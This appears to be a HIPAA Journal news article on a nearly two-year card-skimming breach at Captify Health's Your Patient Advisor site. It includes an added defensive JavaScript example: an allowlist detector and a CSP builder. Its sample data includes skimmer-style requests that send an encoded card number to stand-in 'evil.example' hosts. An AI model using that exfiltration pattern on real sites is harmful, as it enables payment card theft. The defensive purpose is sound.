Captify Health Suffers 3-Year Breach of its Your Patient Advisor Website

Posted By HIPAA Journal on Jan 10, 2023

Captify Health has recently started notifying users of its Your Patient Advisor online service that their sensitive information was exposed and obtained by unauthorized individuals; in some cases, payment card information was stolen and misused. Captify Health prepares patients for colonoscopy procedures by supplying, through its Your Patient Advisor service, the colonoscopy preparation products recommended by their doctors. As an online retailer, Captify Health collects customer information and processes debit/credit card payments through the website.

An external investigation into credit card fraud pointed to Captify Health as the likely source of a data breach, and the company was informed of the potential breach in March 2021. It conducted an internal investigation with the assistance of a third-party digital forensics firm, which identified malicious code on the website that was capturing the data customers entered on the site and transmitting it to a third-party server. That data included full names, addresses, dates of birth, payment card numbers, expiration dates, and security codes. The presence of security codes is telling: PCI DSS prohibits merchants from storing the security code after authorization, so the data was being skimmed as customers typed it into the checkout page rather than lifted from stored records.
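The mechanism described above, a script on the checkout page sending what the customer types to a server the site has no business talking to, is what an origin allowlist is built to catch. The following is an added example, not code from the article or from Captify Health, showing two sides of that control: an offline check that flags outbound requests from a captured checkout session whose destination is not on the allowlist, and a Content-Security-Policy header built from the same list so the browser blocks the exfiltration and reports the attempt. All hostnames (shop.example, api.payments.example, evil.example) and the sample requests are constructed placeholders.

```javascript
// Added example (not from the article or Captify Health): allowlist-based
// detection of card-data exfiltration from a checkout page, plus a CSP that
// enforces the same allowlist in the browser. Hostnames are constructed
// placeholders using reserved .example names.

// Origins the checkout page is legitimately allowed to send data to (assumed).
const ALLOWED_ORIGINS = [
  "https://shop.example",          // first-party site
  "https://api.payments.example",  // payment processor API
];

// Constructed sample of outbound requests captured from one checkout session,
// in the shape you would get from a browser HAR export or a synthetic-monitoring
// run. The last two are what a skimmer typically looks like: the stolen form
// fields base64-encoded into an image pixel URL, or sent via navigator.sendBeacon.
const SAMPLE_REQUESTS = [
  { method: "GET",  url: "https://shop.example/static/checkout.js",        initiator: "script" },
  { method: "POST", url: "https://api.payments.example/v1/tokens",         initiator: "fetch" },
  { method: "GET",  url: "https://cdn.evil.example/p.gif?d=NDExMTExMTExMTExMTExMQ==", initiator: "img" },
  { method: "POST", url: "https://collect.evil.example/s",                 initiator: "beacon" },
];

// Normalizes a URL to its origin (scheme + host, lowercase, default port dropped)
// so "https://Shop.example:443/x" and "https://shop.example/y" compare equal.
function originOf(rawUrl) {
  const u = new URL(rawUrl);
  return `${u.protocol}//${u.host}`;
}

// Returns every request whose destination origin is outside the allowlist.
// Anything here on a checkout page is a finding, whatever the initiator type.
function findExfiltration(requests, allowedOrigins = ALLOWED_ORIGINS) {
  const allowed = new Set(allowedOrigins.map(originOf));
  return requests
    .filter((r) => !allowed.has(originOf(r.url)))
    .map((r) => ({ origin: originOf(r.url), initiator: r.initiator, method: r.method }));
}

// Builds a CSP header from the allowlist. connect-src covers fetch/XHR/beacon,
// img-src covers pixel exfiltration, form-action covers a rewritten form target,
// and report-uri sends each blocked attempt to an endpoint you monitor, so the
// first exfiltration attempt shows up as an alert rather than as card fraud.
function buildCsp(allowedOrigins = ALLOWED_ORIGINS, reportEndpoint = "/csp-report") {
  const list = allowedOrigins.join(" ");
  return [
    "default-src 'self'",
    "script-src 'self'",
    `connect-src ${list}`,
    `img-src ${list}`,
    `form-action ${list}`,
    `report-uri ${reportEndpoint}`,
  ].join("; ");
}

// Stand-alone demo over the constructed session.
console.log("Unexpected destinations:", findExfiltration(SAMPLE_REQUESTS));
console.log("Content-Security-Policy:", buildCsp());
```

The offline check is only as good as the allowlist, so keep it short and review every addition; a third-party tag manager on the checkout page is a common way the list grows until it stops meaning anything. Note what the CSP does and does not do here: because the malicious code in this incident was added to the site's own pages, `script-src 'self'` would not have stopped it from running, but the `connect-src`, `img-src` and `form-action` directives would have stopped it from delivering the data anywhere but the listed origins, and the violation reports would have been visible long before an external fraud investigation.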

The forensic investigation determined that the malicious code was first introduced into the website on May 26, 2019, and remained active until April 20, 2021. During that period of almost two years, 244,296 individuals used the service and potentially had their sensitive information stolen. According to the breach notification letters, sent via the Californian law firm Lewis Brisbois Bisgaard & Smith, an extensive investigation into the potential breach concluded on October 13, 2022, that malicious code had been added to the website. Affected individuals were then identified, their contact information was verified, and breach notification letters were mailed on December 16, 2022.

Captify Health said in its notification letters that “out of an abundance of caution, we have taken steps to ensure our platform is safe and secure for all purchases.” It is unclear how many individuals affected by the breach have experienced misuse of their credit card information. Captify Health has recommended customers carefully review their account statements for signs of fraudulent activity.

Retailers are frequently targeted for payment card data, as happened in the attack on Target, where malware on its point-of-sale systems led to the theft of the payment card details of 40 million customers. What stands out in the Captify Health breach is the timeline: the malicious code was on the website for almost two years before Captify Health was alerted in March 2021, and more than three years before the breach was confirmed; the investigation took 19 months to confirm that a data breach had occurred; and notifications went out 64 days (more than two months) after the malicious code was confirmed on October 13, 2022, and 21 months after Captify Health was first told of fraudulent credit card use.

The incident was reported to the Maine Attorney General on December 16, 2022, but it has not yet appeared on the HHS' Office for Civil Rights breach portal. Captify Health states in its website privacy policy that it is in full compliance with HIPAA and that it signs business associate agreements with doctors who use its service, which indicates the company is a business associate under HIPAA. If so, the HIPAA Breach Notification Rule requires it to report a breach to the affected covered entities without unreasonable delay and no later than 60 days after discovery, so the timeline above is likely to be scrutinized. A breach such as this has significant potential to cause serious reputational damage and puts Captify Health at risk of regulatory fines.